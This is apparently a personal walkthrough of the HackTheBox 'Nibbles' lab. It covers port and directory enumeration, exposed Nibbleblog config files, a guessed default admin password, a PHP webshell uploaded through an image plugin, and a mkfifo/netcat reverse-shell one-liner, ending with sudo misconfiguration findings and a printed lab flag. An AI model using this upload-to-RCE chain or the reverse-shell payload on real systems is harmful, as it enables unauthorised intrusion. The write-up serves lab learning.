ervinismu

HackTheBox - nibbles

11 min read

Nibble Enumeration

Initial scan

nmap -sV --open -oA nibbles_initial_scan  10.129.200.170
 
" ======== about command ========
  -sV : service enumeration scan agains teh default port 1,1000 ports.
  --open : only return open ports.
  -oA : include XML output, greppable format, and text output. 
"

This will scan to look for open ports.

┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ nmap -sV --open -oA nibbles_initial_scan  10.129.200.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-14 21:43 CDT
Nmap scan report for 10.129.200.170
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 seconds

Bases on the output scan, we can see that

  1. Expose Apache web server on port 80
  2. OpenSSH server on port 22
  3. Host is likely Ubuntu linux
  4. SSH is protocol

Try to ls on home history, as you can see we got 3 new files after our initial scan is done.

┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ ls | grep nibble
nibbles_initial_scan.gnmap
nibbles_initial_scan.nmap
nibbles_initial_scan.xml

The file is:

  1. nibbles_initial_scan.gnmap
  2. nibbles_initial_scan.nmap
  3. nibbles_initial_scan.xml

Run full TCP port scan

nmap -p- --open -oA nibbles_full_tcp_scan 10.129.42.190
 
" ======== about command ========
  -p- : 
  --open : only return open ports.
  -oA : include XML output, greppable format, and text output. 
"

This will check for services running on non-standard ports that our initial scan that have missed.

┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ nmap -p- --open -oA nibbles_full_tcp_scan 10.129.200.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-14 21:56 CDT
Nmap scan report for 10.129.200.170
Host is up (0.24s latency).
Not shown: 62495 closed tcp ports (reset), 3038 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 190.08 seconds

Our scan is finished and has not found any additional port.

Do some banner grabbing to confirm result from previous Nmap enumeration result told us.

  1. The target is running an Apache web server on port 80
┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ nc -nv 10.129.200.170 80
(UNKNOWN) [10.129.200.170] 80 (http) open

nc tells us that port 80 running HTTP web server but does not show us the banner.

  1. The target is running an OpenSSH server on port 22
┌─[us-academy-3]─[10.10.14.56]─[htb-ac-834467@htb-forxk8tsmw]─[~]
└──╼ [★]$ nc -nv 10.129.200.170 22
(UNKNOWN) [10.129.200.170] 22 (ssh) open
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2

Nmap script scan

nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190
 
" ======== about command ========
  -sC : 
  -p : 
  -oA : include XML output, greppable format, and text output. 
"

Nibble Web Footprinting

whatweb

  WhatWeb git:(master) ./whatweb 10.129.200.170
ERROR Opening: https://10.129.200.170 - Connection refused - connect(2) for "10.129.200.170" port 443
http://10.129.200.170 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170]

curl

  WhatWeb git:(master) curl 10.129.200.170
<b>Hello world!</b>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
<!-- /nibbleblog/ directory. Nothing interesting here! -->
  WhatWeb git:(master)

whatweb /nibbleblog

  WhatWeb git:(master) ./whatweb 10.129.200.170/nibbleblog
http://10.129.200.170/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170], RedirectLocation[http://10.129.200.170/nibbleblog/], Title[301 Moved Perm
anently]
http://10.129.200.170/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]
  WhatWeb git:(master)

gobuster /nibbleblog/ path

  sc ./gobuster/gobuster dir -u http://10.129.200.170/nibbleblog/ --wordlist SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.200.170/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 304]
/.htaccess            (Status: 403) [Size: 309]
/.htpasswd            (Status: 403) [Size: 309]
/README               (Status: 200) [Size: 4628]
/admin                (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
/themes               (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
  sc

curl README

  sc curl http://10.129.200.170/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
 
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
 
===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog
 
===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content” writable by Apache/PHP
 
Optionals requirements
 
* PHP module - Mcrypt

check /themes check nibbleblog/content

private user content

  sc curl -s http://10.129.200.170/nibbleblog/content/private/users.xml | xmllint  --format -
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>
  sc

additional directory enumeration in the root directory

  sc ./gobuster/gobuster dir -u http://10.129.200.170 --wordlist SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.200.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 293]
/.htpasswd            (Status: 403) [Size: 298]
/.htaccess            (Status: 403) [Size: 298]
/index.html           (Status: 200) [Size: 93]
/server-status        (Status: 403) [Size: 302]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
  sc

taking another look at other directory

  sc curl -s http://10.129.200.170/nibbleblog/content/private/config.xml | xmllint --format -
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <advanced_post_options type="integer">0</advanced_post_options>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <path type="string">/nibbleblog/</path>
  <items_rss type="integer">4</items_rss>
  <items_page type="integer">6</items_page>
  <language type="string">en_US</language>
  <timezone type="string">UTC</timezone>
  <timestamp_format type="string">%d %B, %Y</timestamp_format>
  <locale type="string">en_US</locale>
  <img_resize type="integer">1</img_resize>
  <img_resize_width type="integer">1000</img_resize_width>
  <img_resize_height type="integer">600</img_resize_height>
  <img_resize_quality type="integer">100</img_resize_quality>
  <img_resize_option type="string">auto</img_resize_option>
  <img_thumbnail type="integer">1</img_thumbnail>
  <img_thumbnail_width type="integer">190</img_thumbnail_width>
  <img_thumbnail_height type="integer">190</img_thumbnail_height>
  <img_thumbnail_quality type="integer">100</img_thumbnail_quality>
  <img_thumbnail_option type="string">landscape</img_thumbnail_option>
  <theme type="string">simpler</theme>
  <notification_comments type="integer">1</notification_comments>
  <notification_session_fail type="integer">0</notification_session_fail>
  <notification_session_start type="integer">0</notification_session_start>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
  <notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
  <seo_site_description type="string"/>
  <seo_keywords type="string"/>
  <seo_robots type="string"/>
  <seo_google_code type="string"/>
  <seo_bing_code type="string"/>
  <seo_author type="string"/>
  <friendly_urls type="integer">0</friendly_urls>
  <default_homepage type="integer">0</default_homepage>
</config>
  sc

guessing the default username and password, try to login using admin:nibbles

Nibble Initial Foothold

try to upload .php file in plugin My Image from admin page using this script

<?php system('id'); ?>

after upload, we got an error, but the file are uploaded successfully 

Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26
 
Warning: imagesy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 27
 
Warning: imagecreatetruecolor(): Invalid image dimensions in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 117
 
Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 118
 
Warning: imagejpeg() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 43
 
Warning: imagedestroy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 80

now try to get the uploaded image, we can see image location based on the directory that we found from previous step (directory enumeration step), and we found our php code is executed successfully:

  nibbles curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

craft reverse shell php script

upload and listen the reservse shell

  nibbles ncat -nvlp 9443
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:9443
Ncat: Listening on 0.0.0.0:9443

trigger image using curl

  sc curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php

listen and we got reverse shell

  nibbles ncat -nvlp 9443
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:9443
Ncat: Listening on 0.0.0.0:9443
Ncat: Connection from 10.129.200.170:47760.
/bin/sh: 0: can't access tty; job control turned off
$

try to execute command id, and the result success

  nibbles ncat -nvlp 9443
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:9443
Ncat: Listening on 0.0.0.0:9443
Ncat: Connection from 10.129.200.170:47760.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
$

change to TTY shell using python3

python3 -c 'import pty; pty.spawn("/bin/bash")'

go to home/nibbler and cat the user.txt,a and we found the flag for initial foothold:

nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip  user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
79c03865431abf47b90ef24b9695e148
nibbler@Nibbles:/home/nibbler$

the flag is 79c03865431abf47b90ef24b9695e148.

Privilege Escalation

If we check out privilege in reverse shell using command whoami, it show current user is a not a root user, like below:

nibbler@Nibbles:/home/nibbler$ whoami
whoami
nibbler
nibbler@Nibbles:/home/nibbler$

next we need to escalate it to root user. running LinEnum.sh, after running LinEnum.sh, we got information that indicate the user nibble able to execute sudo privilege against file monitor.sh

[-] Super user account(s):
root
 
 
[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
 
 
[+] Possible sudo pwnage!
/home/nibbler/personal/stuff/monitor.sh
 
 
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root    root    4.0K Dec 10  2017 .
drwxr-xr-x 23 root    root    4.0K Mar 12  2024 ..
drwxr-xr-x  4 nibbler nibbler 4.0K Aug 28 02:16 nibbler
 
 
[-] Root is allowed to login via SSH:
PermitRootLogin yes

Nibble FootPrinting

check with WhatWeb

  WhatWeb-6.0.1 ./whatweb http://10.129.102.62/
http://10.129.102.62/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.62]

check with curl

  WhatWeb-6.0.1 curl http://10.129.102.62/
<b>Hello world!</b>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
<!-- /nibbleblog/ directory. Nothing interesting here! -->

curl the nibbleblog path

  WhatWeb-6.0.1 ./whatweb http://10.129.102.62/nibbleblog
http://10.129.102.62/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.62], RedirectLocation[http://10.129.102.62/nibbleblog/], Title[301 Moved Permanently]
http://10.129.102.62/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.62], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]

Directory Enumeration

  sc ./gobuster/gobuster dir -u http://10.129.102.62/nibbleblog/ --wordlist ~/Documents/sc/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.102.62/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /Users/rvn/Documents/sc/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 308]
/.htaccess            (Status: 403) [Size: 308]
/README               (Status: 200) [Size: 4628]
/admin                (Status: 301) [Size: 325] [--> http://10.129.102.62/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 327] [--> http://10.129.102.62/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 329] [--> http://10.129.102.62/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 327] [--> http://10.129.102.62/nibbleblog/plugins/]
/themes               (Status: 301) [Size: 326] [--> http://10.129.102.62/nibbleblog/themes/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================

/README

  sc curl http://10.129.102.62/nibbleblog/README                                              11:54:57 [50/1888]
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
 
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
 
===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog
 
===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content” writable by Apache/PHP

So we now know the version of Nibbleblog is v4.0.3. /content /templates /admin.php seeing the users.xml

  sc curl -s http://10.129.224.196/nibbleblog/content/private/users.xml | xmllint --format -
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">2</session_fail_count>
    <session_date type="integer">1755754989</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
  <blacklist type="string" ip="10.10.14.117">
    <date type="integer">1755754975</date>
    <fail_count type="integer">5</fail_count>
  </blacklist>
</users>

now we see valid username but no password. Performing additional directory enumeration against root of web application:

  sc ./gobuster/gobuster dir -u http://10.129.224.196/ --wordlist ~/Documents/sc/SecLists/Discovery/Web-Content/
common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.224.196/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /Users/rvn/Documents/sc/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 293]
/.htaccess            (Status: 403) [Size: 298]
/.htpasswd            (Status: 403) [Size: 298]
/index.html           (Status: 200) [Size: 93]
/server-status        (Status: 403) [Size: 302]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================

checking other files in content/private/config.xml

  sc curl -s http://10.129.224.196/nibbleblog/content/private/config.xml | xmllint --format -
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <advanced_post_options type="integer">0</advanced_post_options>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <path type="string">/nibbleblog/</path>
  <items_rss type="integer">4</items_rss>
  <items_page type="integer">6</items_page>
  <language type="string">en_US</language>
  <timezone type="string">UTC</timezone>
  <timestamp_format type="string">%d %B, %Y</timestamp_format>
  <locale type="string">en_US</locale>
  <img_resize type="integer">1</img_resize>
  <img_resize_width type="integer">1000</img_resize_width>
  <img_resize_height type="integer">600</img_resize_height>
  <img_resize_quality type="integer">100</img_resize_quality>
  <img_resize_option type="string">auto</img_resize_option>
  <img_thumbnail type="integer">1</img_thumbnail>
  <img_thumbnail_width type="integer">190</img_thumbnail_width>
  <img_thumbnail_height type="integer">190</img_thumbnail_height>
  <img_thumbnail_quality type="integer">100</img_thumbnail_quality>
  <img_thumbnail_option type="string">landscape</img_thumbnail_option>
  <theme type="string">simpler</theme>
  <notification_comments type="integer">1</notification_comments>
  <notification_session_fail type="integer">0</notification_session_fail>
  <notification_session_start type="integer">0</notification_session_start>
  <notification_email_to type="string">admin@nibbles.com</notification_email_to>
  <notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
  <seo_site_description type="string"/>
  <seo_keywords type="string"/>
  <seo_robots type="string"/>
  <seo_google_code type="string"/>
  <seo_bing_code type="string"/>
  <seo_author type="string"/>
  <friendly_urls type="integer">0</friendly_urls>
  <default_homepage type="integer">0</default_homepage>
</config>

Nibbles - Initial Foothold

  • try to upload vuln php <?php system('id'); ?>.
  • we success upload, but got many error on the web page.
Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26
 
Warning: imagesy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 27
 
Warning: imagecreatetruecolor(): Invalid image dimensions in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 117
 
Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 118
 
Warning: imagejpeg() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 43
 
Warning: imagedestroy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 80
  • curl the uploaded image, and looks like we got the remote code execution on the web server.
  sc curl http://10.129.224.196/nibbleblog/content/private/plugins/my_image/image.php
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
  • edit php file for reverse shell
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.129.224.196 9443 >/tmp/f"); ?>
  • netcat listen in our terminal
nc -lvnp 9443

Graph View